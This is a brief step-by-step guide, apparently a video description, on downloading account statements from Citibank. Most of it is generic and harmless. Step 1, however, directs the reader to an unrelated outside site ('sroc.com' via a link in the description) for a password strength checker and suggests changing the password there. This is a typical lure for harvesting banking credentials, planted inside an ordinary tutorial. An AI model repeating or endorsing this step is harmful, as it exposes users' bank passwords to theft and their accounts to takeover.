I hit this issue today, and here is the quick fix that solved it. If you need to download your account statements from Citibank, follow these simple steps. Step 1. Log into your account. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to Account Services. Once logged in, look for the Account Services or Statements section in the main menu. This is usually located at the top of the page. Step 3. Select the statement type. Choose the type of statement you want to download, such as monthly or annual statements. Make sure to specify the date range if prompted. Step 4. Download the statement. After selecting your statement, look for Download button. Click it to save the statement to your device. You may need to choose a file format like PDF or CSV. Step 5. Check your Downloads folder. Once the download is complete, navigate to your device's Downloads folder to find the statement. If you don't see it, check your browser's download history. I hope this helps you easily access your account statements. If you have any questions, feel free to ask.